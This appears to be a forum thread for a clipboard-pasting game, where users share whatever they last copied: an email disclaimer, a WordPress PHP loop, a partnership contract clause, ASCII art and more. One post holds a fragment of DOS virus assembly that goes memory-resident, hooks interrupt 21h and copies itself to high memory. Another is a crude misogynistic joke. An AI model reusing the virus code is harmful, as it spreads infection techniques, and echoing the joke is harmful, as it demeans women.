[GAME] Cntrl+V


Recommended Posts

Confidentiality notice : The information included in this e-mail, including any attachments, is for the sole use of the intended recipient and may contain information that is confidential. Any unauthorized review, use, disclosure, distribution or similar action is prohibited. If you are not the intended recipient, please contact the sender and delete all copies of the original message immediately.

Link to comment
Share on other sites

<?php

$querystr ="

SELECT $wpdb->posts.post_title, $wpdb->posts.post_date, $wpdb->posts.post_status, $wpdb->posts.post_type FROM $wpdb->posts

WHERE $wpdb->posts.post_status = 'publish' AND $wpdb->posts.post_type = 'post'

ORDER BY $wpdb->posts.post_date DESC

LIMIT $limitp";

$pageposts = $wpdb->get_results($querystr);

if ($pageposts) {

foreach ($pageposts as $post) {

setup_postdata($post);

$title = the_title('','',0);

$titlelength = strlen($title);

if ($titlelength >= 20) {

$dots = "...<br />";

}

else {

$dots = "<br />";

}

echo substr($title,0,20);

echo $dots; ?>

<?php }

} ?>

By the way, anyone who has a better way of doing that should PM me ;)

Link to comment
Share on other sites

10. VOLUNTARY TERMINATION. The partnership may be dissolved at any time by agreement of all partners, in which event the partners shall proceed with reasonable promptness to liquidate the business of the partnership. The partnership name shall be sold with the other assets of the business. The assets of the partnership business shall be used and distributed in the following order: (a) to pay or provide for the payment of all partnership liabilities and liquidating expenses and obligations; (b) to equalize the income accounts of the partners; © to discharge the balance of the income accounts of the partners; (d) to equalize the capital accounts of the partners; and (e) to discharge the balance of the capital accounts of the partners.

Link to comment
Share on other sites

cseg segment

assume cs:cseg, ds:cseg, es:cseg, ss:cseg

signal equ 0FA45h

buf_size equ 250

vice_size equ 1572+buf_size

virus_size equ (offset vend-offset start)+VICE_SIZE

extrn _vice:near

org 0h

start:

call nx ; get relative offset

nx: pop bp

sub bp,offset nx

push ds es

mov ax,signal ; are we memory resident?

int 21h

or ax,ax

jz no_install ; if carry then we are

mov ax,ds ; PSP segment

dec ax ; mcb below PSP m0n

mov ds,ax ; DS=MCB seg

cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain?

jnz no_install

sub word ptr ds: [3],((Program_size+1023)/1024)*64*2 ; alloc MCB

sub word ptr ds: [12h],((Program_size+1023)/1024)*64*2 ; alloc PSP

mov es,word ptr ds: [12h] ; get high mem seg

push cs

pop ds

mov si,bp

mov cx,virus_size/2+1

xor di,di

rep movsw ; copy code to new seg

xor ax,ax

mov ds,ax ; null ds

push ds

lds ax,ds: [21h*4] ; get 21h vector

mov es: word ptr old21+2,ds ; save S:O

mov es: word ptr old21,ax

pop ds

mov ds: [21h*4+2],es ; new int 21h seg

mov ds: [21h*4],offset new21 ; new offset

sub byte ptr ds: [413h],((Program_size+1023)*2)/1024;-totalmem

no_install:

pop es ds ; restore ES DS

cmp cs:is_exe[bp],1

jz exe_return

lea si,org_bytes[bp] ; com return

mov di,0100h ; -restore first 4 bytes

mov cx,2

rep movsw

mov ax,100h ; jump back to 100h

push ax

_ret:ret

exe_return:

mov cx,ds ; calc. real CS

add cx,10h

add word ptr cs:[exe_jump+2+bp],cx

int 3 ; fix prefetch

db 0eah

exe_jump dd 0

is_exe db 0

i wonder if that can get me in trouble.... :( i hope not i was just playing the game.

Edited by littleneutrino
Link to comment
Share on other sites

....................................,.-??...................` `~.,

.............................,.-?............................ .......?-.,

.........................,/.................................. .............?:,

.....................,?...................................... ................\,

.................../......................................... ..................,}

................./........................................... ...........,:`^`..}

.............../............................................. ......,:?........./

..............?.....__....................................... ..:`.........../

............./__.(.....?~-,_..............................,:` ........../

.........../(_....?~,_........?~,_....................,:`.... ...._/

..........{.._$;_......?=,_.......?-,_.......,.-~-,},.~?;/... .}

...........((.....*~_.......?=-._......?;,,./`..../?......... ...../

...,,,___.\`~,......?~.,....................`.....}.......... ..../

............(....`=-,,.......`........................(...... ;_,,-?

............/.`~,......`-...............................\.... ../\

.............\`~.*-,.....................................|,./ .....\,__

,,_..........}.>-._\...................................|.. ............`=~-,

.....`=~-,_\_......`\,.................................\..... .............

...................`=~-,,.\,...............................\. ................

................................`:,,......................... ..`\..............__

.....................................`=-,..................., %`>--==``

........................................_\..........._,-%.... ...`\.

Link to comment
Share on other sites

Have you noticed that most of the women who are against abortion are women you wouldn?t want to f*** in the first place? There?s such balance in nature

Link to comment
Share on other sites

C:\Users\Chris\Documents\iPhone\ReleasedFiles

Weird... don't remember even putting that on my clipboard.

I thought it was going to be a Youtube video.

Chris

Link to comment
Share on other sites

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.